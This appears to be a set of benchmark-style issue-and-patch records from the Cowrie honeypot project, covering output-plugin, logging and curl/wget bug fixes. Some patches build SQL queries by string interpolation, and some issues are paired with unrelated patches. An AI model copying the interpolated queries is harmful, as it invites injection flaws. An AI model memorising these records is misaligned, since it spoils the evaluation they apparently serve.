s h f i n g e r p r i n t : a e 8 b d 7 d d 0 9 9 7 0 5 5 5 a a 4 c 6 e d 2 2 a d b b f 5 6 s r c = 1 9 2 . 1 6 8 . 2 . 5 7 p r o t o = t c p `
2020-11-26T14:32:43
cowrie/cowrie
1,472
cowrie__cowrie-1472
[ "1471" ]
d0739a434bc174d4a421bb5920595368c71796a6
diff --git a/src/cowrie/output/malshare.py b/src/cowrie/output/malshare.py --- a/src/cowrie/output/malshare.py +++ b/src/cowrie/output/malshare.py @@ -41,7 +41,10 @@ from urlparse import urlparse import requests +from twisted.python import log + import cowrie.core.output +from cowrie.core.config import CowrieConfig class Output(cowrie.core.output.Output): @@ -54,7 +57,7 @@ def start(self): """ Start output plugin """ - pass + self.apiKey = CowrieConfig().get('output_malshare', 'api_key') def stop(self): """ @@ -64,7 +67,6 @@ def stop(self): def write(self, entry): if entry["eventid"] == "cowrie.session.file_download": - print("Sending file to MalShare") p = urlparse(entry["url"]).path if p == "": fileName = entry["shasum"] @@ -78,7 +80,6 @@ def write(self, entry): self.postfile(entry["outfile"], fileName) elif entry["eventid"] == "cowrie.session.file_upload": - print("Sending file to MalShare") self.postfile(entry["outfile"], entry["filename"]) def postfile(self, artifact, fileName): @@ -87,12 +88,12 @@ def postfile(self, artifact, fileName): """ try: res = requests.post( - "https://malshare.com/api.php?mode=cli", - files={fileName: open(artifact, "rb")} + "https://malshare.com/api.php?api_key="+self.apiKey+"&action=upload", + files={"upload": open(artifact, "rb")} ) if res and res.ok: - print("Submited to MalShare") + log.msg("Submitted to MalShare") else: - print("MalShare Request failed: {}".format(res.status_code)) + log.msg("MalShare Request failed: {}".format(res.status_code)) except Exception as e: - print("MalShare Request failed: {}".format(e)) + log.msg("MalShare Request failed: {}".format(e))
MalShare uploader not working **Describe the bug** In my config I have ``` [output_malshare] enabled = true ``` and in my logs I have ``` [stdout#info] Sending file to MalShare [stdout#info] Submited to MalShare ``` but when I check on MalShare I can't find any the binaries that have been caught in my honeypot. **To Reproduce** Steps to reproduce the behavior: 1. Enable MalShare submission in your config 2. Wait for a bot to drop a binary in your honeypot 3. Try to find the binary on malshare (search by md5) 4. Observe that the binary is not there **Expected behavior** The binary should be uploaded successfully to MalShare **Server (please complete the following information):** - OS: [e.g. RedHat Linux 7.1, output of uname -a] Ubuntu 20.04, Linux 5.4.0 - Python: 3.8.5 **Additional context** Based on [MalShare's API docs](https://malshare.com/doc.php) it seems that uploading files now requires an API key and a slightly different POST path than the one [defined in cowrie](https://github.com/cowrie/cowrie/blob/b848ec261554ee9128640601eb9a6734b2bffefe/src/cowrie/output/malshare.py#L90). Probably adding an API key option to the config and updating the uploader with the new path and to use the API key will solve this.
2020-12-23T11:39:45
cowrie/cowrie
1,482
cowrie__cowrie-1482
[ "1481" ]
1f443b98444386e64cd90821699c6e943db3ca38
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -144,12 +144,12 @@ def write(self, entry): elif entry["eventid"] == 'cowrie.session.file_download': self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) ' 'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)', - (entry["session"], entry["time"], entry['url'], entry['outfile'], entry['shasum'])) + (entry["session"], entry["time"], entry.get("url", ""), entry['outfile'], entry['shasum'])) elif entry["eventid"] == 'cowrie.session.file_download.failed': self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) ' 'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)', - (entry["session"], entry["time"], entry['url'], 'NULL', 'NULL')) + (entry["session"], entry["time"], entry.get("url", ""), 'NULL', 'NULL')) elif entry["eventid"] == 'cowrie.session.file_upload': self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) '
Mysql error? [twisted.internet.defer#critical] Unhandled error in Deferred ``` 2021-01-11T16:54:56.352309Z [CowrieTelnetTransport,2,41.13.224.97] login attempt [b'root'/b'5up'] succeeded 2021-01-11T16:54:56.353787Z [CowrieTelnetTransport,2,41.13.224.97] Initialized emulated server as architecture: linux-x64-lsb 2021-01-11T16:54:56.354732Z [twisted.internet.defer#critical] Unhandled error in Deferred: 2021-01-11T16:54:56.354941Z [twisted.internet.defer#critical] Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py", line 93, in __call__ self.legacyObserver(event) File "/home/cowrie/cowrie/src/cowrie/core/output.py", line 218, in emit self.write(ev) File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/defer.py", line 1613, in unwindGenerator return _cancellableInlineCallbacks(gen) File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/defer.py", line 1529, in _cancellableInlineCallbacks _inlineCallbacks(None, g, status) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/defer.py", line 1418, in _inlineCallbacks result = g.send(result) File "/home/cowrie/cowrie/src/cowrie/output/mysql.py", line 147, in write (entry["session"], entry["time"], entry['url'], entry['outfile'], entry['shasum'])) builtins.KeyError: 'url' 2021-01-11T16:54:56.413032Z [CowrieTelnetTransport,2,41.13.224.97] Warning: state changed and new state returned ```
I saw this issue too. I suppose, this happens when a visitor uploads a file to your honeypot using scp. In this case, there is clearly no URL defined. And the error here is raised exactly because there is no `url` key in the `entry` object. I fixed it by replacing `entry["url"]` with `entry.get("url", "")`. Now if there is no URL present in the event, it will be simply set to an empty value. A code snippet from my `src/cowrie/output/mysql.py`: ``` elif entry["eventid"] == 'cowrie.session.file_download': self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) ' 'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)', (entry["session"], entry["time"], entry.get("url", ""), entry['outfile'], entry['shasum'])) elif entry["eventid"] == 'cowrie.session.file_download.failed': self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) ' 'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)', (entry["session"], entry["time"], entry.get("url", ""), 'NULL', 'NULL')) ``` I can make a pull request if there is no better idea how to solve this.
2021-01-12T21:56:45
cowrie/cowrie
1,551
cowrie__cowrie-1551
[ "1549" ]
f2f1b3b150371d77f6eda651270ef9810148c5c6
diff --git a/src/cowrie/core/output.py b/src/cowrie/core/output.py --- a/src/cowrie/core/output.py +++ b/src/cowrie/core/output.py @@ -158,7 +158,7 @@ def emit(self, event: dict) -> None: if "message" not in event and "format" not in event: return - ev: Dict[str, any] = event # type: ignore + ev: Dict[str, any] = event.copy() # type: ignore ev["sensor"] = self.sensor if "isError" in ev:
builtins.KeyError: 'log_time' Python error **Describe the bug** Cowrie won't log properly, due that output plugins are not working -> output_splunk Following error occurs: ``` 2021-04-28T07:00:17.796991Z [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.virustotal.Output object at 0x7f3a13c9c550>>) due to exception: [Failure instance: Traceback: <class 'KeyError'>: 'log_time' /home/cowrie/cowrie/src/cowrie/ssh/transport.py:246:connectionLost /home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/threadable.py:51:sync /home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py:281:msg /home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py:147:publishToNewObserver --- <exception caught here> --- /home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_observer.py:82:__call__ /home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py:55:__call__ ] Traceback (most recent call last): File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 246, in connectionLost log.msg( File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/threadable.py", line 51, in sync return function(self, *args, **kwargs) File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py", line 281, in msg _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py", line 147, in publishToNewObserver observer(eventDict) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_observer.py", line 82, in __call__ observer(event) File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py", line 55, in __call__ event["time"] = event["log_time"] builtins.KeyError: 'log_time' ``` **To Reproduce** Steps to reproduce the behavior: 1. git clone cowrie 2. setup venv 3. setup cowrie.cfg 4. include splunk output 5. run cowrie 6. run honeypot session **Expected behavior** Cowrie should properly log. **Server (please complete the following information):** - OS: `Linux cowrie-1 5.4.103-1-pve #1 SMP PVE 5.4.103-1 (Sun, 07 Mar 2021 15:55:09 +0100) x86_64 x86_64 x86_64 GNU/Linux` - Python: Python 3.8.6
Thanks for reporting this, I'm running into the same error with other output such as textlog, MySQL and SQLite as well. Steps to reproduce are the same, with the difference of setting up those output methods in the cowrie.cfg file. Thanks for notifying about this! Maybe something has changed upstream in Twisted. I'll investigate. I'm trying to replicate this, but I can't seem to, which makes me think it might be something in your environment. Which version of Twisted are you using? and which version of Cowrie (downloaded version or git pull) The output of pip show twisted: ``` Name: Twisted Version: 21.2.0 Summary: An asynchronous networking framework written in Python Home-page: https://twistedmatrix.com/ Author: Twisted Matrix Laboratories Author-email: [email protected] License: MIT Location: /home/cowrie/cowrie/cowrie-env/lib/python3.7/site-packages Requires: constantly, hyperlink, attrs, incremental, Automat, zope.interface Required-by: treq ``` I set up Cowrie according to the documentation and cloned the repo. (sorry if this double posts, I sent a reply earlier via email but it doesn't seem to add to thread) Okay, I can reproduce it now. Thanks for the info! I tried with the virustotal plugin earlier, but now I get the error with `textlog`.
2021-05-02T05:09:09
cowrie/cowrie
1,563
cowrie__cowrie-1563
[ "1560" ]
0cd1fd89de824dd1e374fdec06b004cc87d9a0b5
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -95,14 +95,14 @@ def simpleQuery(self, sql, args): def write(self, entry): if entry["eventid"] == "cowrie.session.connect": r = yield self.db.runQuery( - f"SELECT `id`\" \"FROM `sensors`\" \"WHERE `ip` = {self.sensor}" + "SELECT `id`" "FROM `sensors`" f"WHERE `ip` = {self.sensor}" ) if r: sensorid = r[0][0] else: yield self.db.runQuery( - f"INSERT INTO `sensors` (`ip`) \" \"VALUES ({self.sensor})" + "INSERT INTO `sensors` (`ip`) " f"VALUES ({self.sensor})" ) r = yield self.db.runQuery("SELECT LAST_INSERT_ID()")
9may
2021-05-23T05:10:31
cowrie/cowrie
1,564
cowrie__cowrie-1564
[ "1562" ]
0cd1fd89de824dd1e374fdec06b004cc87d9a0b5
diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -36,7 +36,7 @@ ], setup_requires=["incremental", "click"], install_requires=[ - "twisted>=17.1.0", + "twisted==21.1.0", "cryptography>=0.9.1", "configparser", "pyopenssl", @@ -48,7 +48,7 @@ "service_identity>=14.0.0", ], extras_require={ - "csirtg": ["csirtgsdk>=0.0.0a17"], + "csirtg": ["csirtgsdk==1.1.5"], "dshield": ["requests"], "elasticsearch": ["pyes"], "mysql": ["mysqlclient"], diff --git a/src/cowrie/output/csirtg.py b/src/cowrie/output/csirtg.py --- a/src/cowrie/output/csirtg.py +++ b/src/cowrie/output/csirtg.py @@ -1,41 +1,50 @@ import os from datetime import datetime -from csirtgsdk.client import Client -from csirtgsdk.indicator import Indicator - from twisted.python import log import cowrie.core.output from cowrie.core.config import CowrieConfig -USERNAME = os.environ.get("CSIRTG_USER") -FEED = os.environ.get("CSIRTG_FEED") -TOKEN = os.environ.get("CSIRG_TOKEN") -DESCRIPTION = os.environ.get("CSIRTG_DESCRIPTION", "random scanning activity") +token = CowrieConfig.get("output_csirtg", "token", fallback="a1b2c3d4") +if token == "a1b2c3d4": + log.msg("output_csirtg: token not found in configuration file") + exit(1) + +os.environ["CSIRTG_TOKEN"] = token +import csirtgsdk # noqa: E402 class Output(cowrie.core.output.Output): """ - csirtg output + CSIRTG output """ - def start( - self, - ): - self.user = CowrieConfig.get("output_csirtg", "username") or USERNAME - self.feed = CowrieConfig.get("output_csirtg", "feed") or FEED - self.token = CowrieConfig.get("output_csirtg", "token") or TOKEN - self.description = CowrieConfig.get( - "output_csirtg", "description", fallback=DESCRIPTION - ) + def start(self): + """ + Start the output module. + Note that csirtsdk is imported here because it reads CSIRTG_TOKEN on import + Cowrie sets this environment variable. + """ + self.user = CowrieConfig.get("output_csirtg", "username") + self.feed = CowrieConfig.get("output_csirtg", "feed") + self.debug = CowrieConfig.getboolean("output_csirtg", "debug", fallback=False) + self.description = CowrieConfig.get("output_csirtg", "description") + self.context = {} - self.client = Client(token=self.token) + # self.client = csirtgsdk.client.Client() def stop(self): pass def write(self, e): + """ + Only pass on connection events + """ + if e["eventid"] == "cowrie.session.connect": + self.submitIp(e) + + def submitIp(self, e): peerIP = e["src_ip"] ts = e["timestamp"] system = e.get("system", None) @@ -77,5 +86,12 @@ def write(self, e): "description": self.description, } - ret = Indicator(self.client, i).submit() - log.msg("logged to csirtg {} ".format(ret["location"])) + if self.debug is True: + log.msg(f"output_csirtg: Submitting {i!r} to CSIRTG") + + ind = csirtgsdk.indicator.Indicator(i).submit() + + if self.debug is True: + log.msg(f"output_csirtg: Submitted {ind!r} to CSIRTG") + + log.msg("output_csirtg: submitted to csirtg at {} ".format(ind["location"]))
/etc/shadow file contents are incorrect **Describe the bug** In the latest honeypot from master branch, a “cat /etc/shadow“ outputs a readme file instead of password contents. It looks the commit 937402ece56a4d272713ea38be32c6dc4191390a replaced the file contents. **To Reproduce** - enter honeypot as root - Run: cat /etc/shadow **Expected behavior** Exoecting a shadow file format output, not readme **Server (please complete the following information):** - Using the docker image built on 14 may 2021
2021-05-23T06:39:56
cowrie/cowrie
1,568
cowrie__cowrie-1568
[ "1567", "1567" ]
9af813994e15978630b62d27d7ae112c0471236d
diff --git a/src/cowrie/commands/curl.py b/src/cowrie/commands/curl.py --- a/src/cowrie/commands/curl.py +++ b/src/cowrie/commands/curl.py @@ -268,10 +268,13 @@ def download(self, url, fakeoutfile, outputfile, *args, **kwargs): self.exit() return None - # TODO: need to do full name resolution. - if ipaddress.ip_address(host).is_private: - self.errorWrite("curl: (6) Could not resolve host: {}\n".format(host)) - return None + # TODO: need to do full name resolution in case someon passes DNS name pointing to local address + try: + if ipaddress.ip_address(host).is_private: + self.errorWrite("curl: (6) Could not resolve host: {}\n".format(host)) + return None + except ValueError: + pass factory = HTTPProgressDownloader( self, fakeoutfile, url, outputfile, *args, **kwargs diff --git a/src/cowrie/commands/wget.py b/src/cowrie/commands/wget.py --- a/src/cowrie/commands/wget.py +++ b/src/cowrie/commands/wget.py @@ -154,14 +154,17 @@ def download(self, url, fakeoutfile, *args, **kwargs): self.errorWrite("HTTP request sent, awaiting response... ") # TODO: need to do full name resolution. - if ipaddress.ip_address(host).is_private: - self.errorWrite( - "Resolving {} ({})... failed: nodename nor servname provided, or not known.\n".format( - host, host + try: + if ipaddress.ip_address(host).is_private: + self.errorWrite( + "Resolving {} ({})... failed: nodename nor servname provided, or not known.\n".format( + host, host + ) ) - ) self.errorWrite("wget: unable to resolve host address ‘{}’\n".format(host)) return None + except ValueError: + pass # File in host's fs that will hold content of the downloaded file # HTTPDownloader will close() the file object so need to preserve the name
Unable to curl or wget URL with hostname If you try to download anything via curl or wget and url contains hostname not ip address it crashes. I am pretty sure it is because of https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7 Line: # TODO: need to do full name resolution. Example: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@czbrqobpvmssd01:~# wget notino.czConnection to czbrqobpvmssd01 closed by remote host. Connection to czbrqobpvmssd01 closed. 2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start self.deferred = self.download(self.url, self.outfile) File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download if ipaddress.ip_address(host).is_private: File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address address) builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address Unable to curl or wget URL with hostname If you try to download anything via curl or wget and url contains hostname not ip address it crashes. I am pretty sure it is because of https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7 Line: # TODO: need to do full name resolution. Example: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@czbrqobpvmssd01:~# wget notino.czConnection to czbrqobpvmssd01 closed by remote host. Connection to czbrqobpvmssd01 closed. 2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, message_num, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage self.service.packetReceived(messageNum, payload) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived return f(packet) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA channel.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived self.client.transport.write(data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start self.deferred = self.download(self.url, self.outfile) File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download if ipaddress.ip_address(host).is_private: File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address address) builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
2021-05-29T04:35:37
cowrie/cowrie
1,575
cowrie__cowrie-1575
[ "1567" ]
705de8e16cee9c3bece4cc247ff1bcc5b9220e93
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -2,9 +2,6 @@ MySQL output connector. Writes audit logs to MySQL database """ - -import MySQLdb - from twisted.enterprise import adbapi from twisted.internet import defer from twisted.python import log @@ -12,6 +9,9 @@ import cowrie.core.output from cowrie.core.config import CowrieConfig +# For exceptions: https://dev.mysql.com/doc/connector-python/en/connector-python-api-errors-error.html +import mysql.connector + class ReconnectingConnectionPool(adbapi.ConnectionPool): """ @@ -22,6 +22,11 @@ class ReconnectingConnectionPool(adbapi.ConnectionPool): by checking exceptions by error code and only disconnecting the current connection instead of all of them. + CR_CONN_HOST_ERROR: 2003: Cant connect to MySQL server on server (10061) + CR_SERVER_GONE_ERROR: 2006: MySQL server has gone away + CR_SERVER_LOST 2013: Lost connection to MySQL server + ER_LOCK_DEADLOCK 1213: Deadlock found when trying to get lock) + Also see: http://twistedmatrix.com/pipermail/twisted-python/2009-July/020007.html """ @@ -29,10 +34,17 @@ class ReconnectingConnectionPool(adbapi.ConnectionPool): def _runInteraction(self, interaction, *args, **kw): try: return adbapi.ConnectionPool._runInteraction(self, interaction, *args, **kw) - except (MySQLdb.OperationalError, MySQLdb._exceptions.OperationalError) as e: - if e.args[0] not in (2003, 2006, 2013): + except mysql.connector.Error as e: + # except (MySQLdb.OperationalError, MySQLdb._exceptions.OperationalError) as e: + if e.errno not in ( + mysql.connector.errorcode.CR_CONN_HOST_ERROR, + mysql.connector.errorcode.CR_SERVER_GONE_ERROR, + mysql.connector.errorcode.CR_SERVER_LOST, + mysql.connector.errorcode.ER_LOCK_DEADLOCK, + ): raise e - log.msg(f"RCP: got error {e}, retrying operation") + + log.msg(f"output_mysql: got error {e!r}, retrying operation") conn = self.connections.get(self.threadID()) self.disconnect(conn) # Try the interaction again @@ -41,7 +53,7 @@ def _runInteraction(self, interaction, *args, **kw): class Output(cowrie.core.output.Output): """ - mysql output + MySQL output """ db = None @@ -52,7 +64,7 @@ def start(self): port = CowrieConfig.getint("output_mysql", "port", fallback=3306) try: self.db = ReconnectingConnectionPool( - "MySQLdb", + "mysql.connector", host=CowrieConfig.get("output_mysql", "host"), db=CowrieConfig.get("output_mysql", "database"), user=CowrieConfig.get("output_mysql", "username"), @@ -64,11 +76,11 @@ def start(self): cp_reconnect=True, use_unicode=True, ) - except (MySQLdb.Error, MySQLdb._exceptions.Error) as e: + # except (MySQLdb.Error, MySQLdb._exceptions.Error) as e: + except Exception as e: log.msg(f"output_mysql: Error {e.args[0]}: {e.args[1]}") def stop(self): - self.db.commit() self.db.close() def sqlerror(self, error): @@ -78,7 +90,7 @@ def sqlerror(self, error): """ if error.value.args[0] in (1146, 1406): log.msg(f"output_mysql: MySQL Error: {error.value.args!r}") - log.msg("MySQL schema maybe misconfigured, doublecheck database!") + log.msg("output_mysql: MySQL schema maybe misconfigured, doublecheck database!") else: log.msg(f"output_mysql: MySQL Error: {error.value.args!r}") @@ -94,15 +106,19 @@ def simpleQuery(self, sql, args): @defer.inlineCallbacks def write(self, entry): if entry["eventid"] == "cowrie.session.connect": + if self.debug: + log.msg(f"output_mysql: SELECT `id` FROM `sensors` WHERE `ip` = '{self.sensor}'") r = yield self.db.runQuery( - "SELECT `id`" "FROM `sensors`" f"WHERE `ip` = {self.sensor}" + f"SELECT `id` FROM `sensors` WHERE `ip` = '{self.sensor}'" ) if r: sensorid = r[0][0] else: + if self.debug: + log.msg(f"output_mysql: INSERT INTO `sensors` (`ip`) VALUES ('{self.sensor}')") yield self.db.runQuery( - "INSERT INTO `sensors` (`ip`) " f"VALUES ({self.sensor})" + f"INSERT INTO `sensors` (`ip`) VALUES ('{self.sensor}')" ) r = yield self.db.runQuery("SELECT LAST_INSERT_ID()")
Unable to curl or wget URL with hostname If you try to download anything via curl or wget and url contains hostname not ip address it crashes. I am pretty sure it is because of https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7 Line: # TODO: need to do full name resolution. Example: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@czbrqobpvmssd01:~# wget notino.czConnection to czbrqobpvmssd01 closed by remote host. Connection to czbrqobpvmssd01 closed. 2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, 